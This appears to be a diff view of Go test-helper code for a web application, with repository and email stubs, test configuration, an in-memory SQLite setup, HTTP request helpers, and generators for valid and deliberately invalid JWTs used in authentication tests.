func (s *UserRepositoryStub) GetByVerificationToken(token string) (*database.User, error) {
if s != nil && s.GetByVerificationFn != nil {
return s.GetByVerificationFn(token)
}
return nil, gorm.ErrRecordNotFound
}
func (s *UserRepositoryStub) GetByPasswordResetToken(token string) (*database.User, error) {
if s != nil && s.GetByPasswordResetFn != nil {
return s.GetByPasswordResetFn(token)
}
return nil, gorm.ErrRecordNotFound
}
func (s *UserRepositoryStub) GetAll(limit, offset int) ([]database.User, error) {
if s != nil && s.GetAllFn != nil {
return s.GetAllFn(limit, offset)
}
return nil, nil
}
func (s *UserRepositoryStub) Update(user *database.User) error {
if s != nil && s.UpdateFn != nil {
return s.UpdateFn(user)
}
return nil
}
func (s *UserRepositoryStub) Delete(id uint) error {
if s != nil && s.DeleteFn != nil {
return s.DeleteFn(id)
}
return nil
}
func (s *UserRepositoryStub) HardDelete(id uint) error {
if s != nil && s.HardDeleteFn != nil {
return s.HardDeleteFn(id)
}
return nil
}
func (s *UserRepositoryStub) SoftDeleteWithPosts(id uint) error {
if s != nil && s.SoftDeleteWithPostsFn != nil {
return s.SoftDeleteWithPostsFn(id)
}
return nil
}
func (s *UserRepositoryStub) Lock(id uint) error {
if s != nil && s.LockFn != nil {
return s.LockFn(id)
}
return nil
}
func (s *UserRepositoryStub) Unlock(id uint) error {
if s != nil && s.UnlockFn != nil {
return s.UnlockFn(id)
}
return nil
}
func (s *UserRepositoryStub) GetPosts(userID uint, limit, offset int) ([]database.Post, error) {
if s != nil && s.GetPostsFn != nil {
return s.GetPostsFn(userID, limit, offset)
}
return nil, nil
}
func (s *UserRepositoryStub) GetDeletedUsers() ([]database.User, error) {
if s != nil && s.GetDeletedUsersFn != nil {
return s.GetDeletedUsersFn()
}
return nil, nil
}
func (s *UserRepositoryStub) HardDeleteAll() (int64, error) {
if s != nil && s.HardDeleteAllFn != nil {
return s.HardDeleteAllFn()
}
return 0, nil
}
func (s *UserRepositoryStub) Count() (int64, error) {
if s != nil && s.CountFn != nil {
return s.CountFn()
}
return 0, nil
}
func (s *UserRepositoryStub) WithTx(tx *gorm.DB) repositories.UserRepository {
if s != nil && s.WithTxFn != nil {
return s.WithTxFn(tx)
}
return s
}
type EmailSenderStub struct {
SendFn func(to, subject, body string) error
}
func (s *EmailSenderStub) Send(to, subject, body string) error {
if s != nil && s.SendFn != nil {
return s.SendFn(to, subject, body)
}
return nil
}
type TitleFetcherStub struct {
FetchTitleFn func(ctx context.Context, rawURL string) (string, error)
}
func (s *TitleFetcherStub) FetchTitle(ctx context.Context, rawURL string) (string, error) {
if s != nil && s.FetchTitleFn != nil {
return s.FetchTitleFn(ctx, rawURL)
}
return "", nil
}

View File

@@ -0,0 +1,350 @@
package testutils
import (
"bytes"
"context"
"encoding/json"
"fmt"
"net/http"
"net/http/httptest"
"os"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"github.com/go-chi/chi/v5"
"golang.org/x/crypto/bcrypt"
"gorm.io/driver/sqlite"
"gorm.io/gorm"
"gorm.io/gorm/logger"
"goyco/internal/config"
"goyco/internal/database"
"goyco/internal/middleware"
"goyco/internal/repositories"
)
var AppTestConfig = &config.Config{
JWT: config.JWTConfig{
Secret: "test-secret-key-for-testing-purposes-only",
Expiration: 24,
RefreshExpiration: 168,
Issuer: "goyco",
Audience: "goyco-users",
},
App: config.AppConfig{
BaseURL: "http://localhost:8080",
BcryptCost: 10,
},
RateLimit: config.RateLimitConfig{
AuthLimit: 5,
GeneralLimit: 100,
HealthLimit: 60,
MetricsLimit: 10,
TrustProxyHeaders: false,
},
}
func NewTestConfig() *config.Config {
return &config.Config{
Database: config.DatabaseConfig{
Host: "localhost",
Port: "5432",
User: "test",
Password: "test",
Name: "test_db",
SSLMode: "disable",
},
Server: config.ServerConfig{
Host: "localhost",
Port: "8080",
},
JWT: config.JWTConfig{
Secret: "test-jwt-secret-key-that-is-long-enough",
Expiration: 24,
RefreshExpiration: 168,
Issuer: "goyco",
Audience: "goyco-users",
},
SMTP: config.SMTPConfig{
Host: "localhost",
Port: 587,
Username: "test",
Password: "test",
From: "test@example.com",
},
App: config.AppConfig{
Debug: true,
BaseURL: "http://localhost:8080",
},
RateLimit: config.RateLimitConfig{
AuthLimit: 5,
GeneralLimit: 100,
HealthLimit: 60,
MetricsLimit: 10,
TrustProxyHeaders: false,
},
LogDir: "/tmp/goyco-test-logs",
PIDDir: "/tmp/goyco-test-pids",
}
}
func sanitizeTestName(name string) string {
replacer := strings.NewReplacer(
"/", "_",
"#", "_",
"\\", "_",
"?", "_",
"&", "_",
"=", "_",
" ", "_",
)
return replacer.Replace(name)
}
func NewTestDB(t *testing.T) *gorm.DB {
t.Helper()
sanitizedName := sanitizeTestName(t.Name())
dbName := "file:memdb_" + sanitizedName + "?mode=memory&cache=shared&_journal_mode=WAL&_synchronous=NORMAL"
db, err := gorm.Open(sqlite.Open(dbName), &gorm.Config{
Logger: logger.Default.LogMode(logger.Silent),
})
if err != nil {
t.Fatalf("Failed to connect to test database: %v", err)
}
err = db.AutoMigrate(
&database.User{},
&database.Post{},
&database.Vote{},
&database.AccountDeletionRequest{},
&database.RefreshToken{},
)
if err != nil {
t.Fatalf("Failed to migrate database: %v", err)
}
if execErr := db.Exec("PRAGMA busy_timeout = 5000").Error; execErr != nil {
t.Fatalf("Failed to configure busy timeout: %v", execErr)
}
if execErr := db.Exec("PRAGMA foreign_keys = ON").Error; execErr != nil {
t.Fatalf("Failed to enable foreign keys: %v", execErr)
}
sqlDB, err := db.DB()
if err != nil {
t.Fatalf("Failed to access SQL DB: %v", err)
}
sqlDB.SetMaxOpenConns(1)
sqlDB.SetMaxIdleConns(1)
sqlDB.SetConnMaxLifetime(5 * time.Minute)
return db
}
type HTTPTestHelpers struct {
t *testing.T
}
func NewHTTPTestHelpers(t *testing.T) *HTTPTestHelpers {
return &HTTPTestHelpers{t: t}
}
func (h *HTTPTestHelpers) POST(url string, body any) *http.Request {
jsonBody, err := json.Marshal(body)
if err != nil {
h.t.Fatalf("Failed to marshal request body: %v", err)
}
req := httptest.NewRequest("POST", url, bytes.NewBuffer(jsonBody))
req.Header.Set("Content-Type", "application/json")
return req
}
func (h *HTTPTestHelpers) GET(url string) *http.Request {
return httptest.NewRequest("GET", url, nil)
}
func (h *HTTPTestHelpers) PUT(url string, body any) *http.Request {
jsonBody, err := json.Marshal(body)
if err != nil {
h.t.Fatalf("Failed to marshal request body: %v", err)
}
req := httptest.NewRequest("PUT", url, bytes.NewBuffer(jsonBody))
req.Header.Set("Content-Type", "application/json")
return req
}
func (h *HTTPTestHelpers) DELETE(url string) *http.Request {
return httptest.NewRequest("DELETE", url, nil)
}
func WithURLParams(req *http.Request, params map[string]string) *http.Request {
routeContext := chi.NewRouteContext()
for key, value := range params {
routeContext.URLParams.Add(key, value)
}
ctx := context.WithValue(req.Context(), chi.RouteCtxKey, routeContext)
return req.WithContext(ctx)
}
func WithUserContext(req *http.Request, key any, userID uint) *http.Request {
ctx := context.WithValue(req.Context(), key, userID)
return req.WithContext(ctx)
}
func CreateTestUser(t *testing.T, db *gorm.DB) *database.User {
t.Helper()
user := &database.User{
Username: "testuser",
Email: "test@example.com",
Password: "hashedpassword123",
EmailVerified: true,
}
if err := db.Create(user).Error; err != nil {
t.Fatalf("Failed to create test user: %v", err)
}
return user
}
func CreateTestPost(t *testing.T, db *gorm.DB, authorID uint) *database.Post {
t.Helper()
post := &database.Post{
Title: "Test Post",
URL: "https://example.com/test",
Content: "Test content",
AuthorID: &authorID,
}
if err := db.Create(post).Error; err != nil {
t.Fatalf("Failed to create test post: %v", err)
}
return post
}
func CreateTestPIDFile(t *testing.T, pid int) string {
dir := t.TempDir()
pidFile := filepath.Join(dir, "goyco.pid")
err := os.WriteFile(pidFile, []byte(strconv.Itoa(pid)), 0644)
if err != nil {
t.Fatalf("Failed to create test PID file: %v", err)
}
return pidFile
}
type HandlerTestHelper struct {
t *testing.T
}
func NewHandlerTestHelper(t *testing.T) *HandlerTestHelper {
return &HandlerTestHelper{t: t}
}
func (h *HandlerTestHelper) AssertResponseSuccess(t *testing.T, response map[string]any) {
if success, ok := response["success"].(bool); !ok || !success {
t.Fatalf("Expected success=true, got %v", response["success"])
}
}
func (h *HandlerTestHelper) AssertResponseError(t *testing.T, response map[string]any) {
if success, ok := response["success"].(bool); !ok || success {
t.Fatalf("Expected success=false, got %v", response["success"])
}
}
func (h *HandlerTestHelper) AssertStatusCode(t *testing.T, recorder *httptest.ResponseRecorder, expected int) {
if recorder.Result().StatusCode != expected {
t.Fatalf("Expected status %d, got %d", expected, recorder.Result().StatusCode)
}
}
func (h *HandlerTestHelper) CreateTestRequestWithUser(method, url string, body any, userID uint) *http.Request {
var req *http.Request
if body != nil {
jsonBody, err := json.Marshal(body)
if err != nil {
h.t.Fatalf("Failed to marshal request body: %v", err)
}
req = httptest.NewRequest(method, url, bytes.NewBuffer(jsonBody))
} else {
req = httptest.NewRequest(method, url, nil)
}
req.Header.Set("Content-Type", "application/json")
return WithUserContext(req, middleware.UserIDKey, userID)
}
func (h *HandlerTestHelper) CreateTestRequest(method, url string, body any) *http.Request {
var req *http.Request
if body != nil {
jsonBody, err := json.Marshal(body)
if err != nil {
h.t.Fatalf("Failed to marshal request body: %v", err)
}
req = httptest.NewRequest(method, url, bytes.NewBuffer(jsonBody))
} else {
req = httptest.NewRequest(method, url, nil)
}
req.Header.Set("Content-Type", "application/json")
return req
}
func (h *HandlerTestHelper) DecodeResponse(t *testing.T, recorder *httptest.ResponseRecorder) map[string]any {
var response map[string]any
if err := json.Unmarshal(recorder.Body.Bytes(), &response); err != nil {
t.Fatalf("Failed to decode response: %v", err)
}
return response
}
type ServiceSuite struct {
DB *gorm.DB
UserRepo repositories.UserRepository
PostRepo repositories.PostRepository
VoteRepo repositories.VoteRepository
DeletionRepo repositories.AccountDeletionRepository
RefreshTokenRepo *repositories.RefreshTokenRepository
EmailSender *MockEmailSender
TitleFetcher *MockTitleFetcher
}
func NewServiceSuite(t *testing.T) *ServiceSuite {
t.Helper()
db := NewTestDB(t)
userRepo := repositories.NewUserRepository(db)
postRepo := repositories.NewPostRepository(db)
voteRepo := repositories.NewVoteRepository(db)
deletionRepo := repositories.NewAccountDeletionRepository(db)
refreshTokenRepo := repositories.NewRefreshTokenRepository(db)
emailSender := &MockEmailSender{}
titleFetcher := &MockTitleFetcher{}
t.Cleanup(func() {
sqlDB, _ := db.DB()
sqlDB.Close()
})
return &ServiceSuite{
DB: db,
UserRepo: userRepo,
PostRepo: postRepo,
VoteRepo: voteRepo,
DeletionRepo: deletionRepo,
RefreshTokenRepo: refreshTokenRepo,
EmailSender: emailSender,
TitleFetcher: titleFetcher,
}
}
func (s *ServiceSuite) Cleanup() {
}
func HashPassword(password string) string {
hashed, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
if err != nil {
panic(fmt.Sprintf("Failed to hash password: %v", err))
}
return string(hashed)
}

View File

@@ -0,0 +1,83 @@
package testutils
import (
"fmt"
"testing"
"time"
"github.com/golang-jwt/jwt/v5"
"goyco/internal/config"
"goyco/internal/database"
)
const (
TokenTypeAccess = "access"
TokenTypeRefresh = "refresh"
)
type TokenClaims struct {
UserID uint `json:"sub"`
Username string `json:"username"`
SessionVersion uint `json:"session_version"`
TokenType string `json:"type"`
KeyID string `json:"kid,omitempty"`
jwt.RegisteredClaims
}
type TokenOption func(*TokenClaims, *config.JWTConfig) string
func GenerateTestToken(t *testing.T, user *database.User, cfg *config.JWTConfig, opts ...TokenOption) string {
t.Helper()
claims := TokenClaims{
UserID: user.ID,
Username: user.Username,
SessionVersion: user.SessionVersion,
TokenType: TokenTypeAccess,
RegisteredClaims: jwt.RegisteredClaims{
Issuer: cfg.Issuer,
Audience: []string{cfg.Audience},
Subject: fmt.Sprint(user.ID),
IssuedAt: jwt.NewNumericDate(time.Now()),
ExpiresAt: jwt.NewNumericDate(time.Now().Add(24 * time.Hour)),
},
}
secret := cfg.Secret
for _, opt := range opts {
if opt != nil {
secret = opt(&claims, cfg)
if secret == "" {
secret = cfg.Secret
}
}
}
token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
tokenString, err := token.SignedString([]byte(secret))
if err != nil {
t.Fatalf("failed to create token: %v", err)
}
return tokenString
}
func WithExpiredToken(claims *TokenClaims, cfg *config.JWTConfig) string {
claims.IssuedAt = jwt.NewNumericDate(time.Now().Add(-2 * time.Hour))
claims.ExpiresAt = jwt.NewNumericDate(time.Now().Add(-1 * time.Hour))
return cfg.Secret
}
func WithTamperedSecret(claims *TokenClaims, cfg *config.JWTConfig) string {
return cfg.Secret + "-tampered"
}
func WithWrongIssuer(claims *TokenClaims, cfg *config.JWTConfig) string {
claims.Issuer = "wrong-issuer"
return cfg.Secret
}
func WithWrongAudience(claims *TokenClaims, cfg *config.JWTConfig) string {
claims.Audience = []string{"wrong-audience"}
return cfg.Secret
}